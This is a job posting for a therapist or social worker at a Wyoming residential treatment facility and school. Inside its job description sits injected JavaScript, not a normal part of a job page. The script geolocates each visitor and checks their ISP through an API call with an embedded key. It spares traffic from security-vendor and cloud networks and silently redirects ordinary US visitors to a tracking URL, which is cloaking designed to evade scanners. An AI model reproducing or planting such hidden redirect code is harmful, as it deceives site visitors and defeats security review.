Therapist or Social Worker

Casper, WY
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/a88f482b060cb254/3648590c2eb0c73e0228cf6304df2ae0097816675d0bbecff278a88c07da3f4b/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Make a meaningful impact on K-12 students’ lives while living and working in Jackson Hole, WY, at a residential treatment facility and public school serving students with social, emotional, and behavioral challenges.

Responsibilities include providing therapy, family services, crisis intervention, behavior and safety planning, and collaborating within a multidisciplinary team. The role involves involving families and districts in care planning and completing documentation per regulations. Monthly on-call duties are shared among team members.

Qualifications require a Master’s degree in Counseling, Social Work, Marriage and Family Therapy, or related field, with a Wyoming license (State Board or PTSB).

Position is contracted for about 225 days/year, with salary ranging from $49,000 to $76,000, based on experience.

Benefits include health and dental insurance (95% employer-paid), paid sick leave, life insurance, retirement contributions, housing or transportation stipends, and optional plans. Must pass background, TB, drug, and driving checks.

Work is in person; full-time, contract position.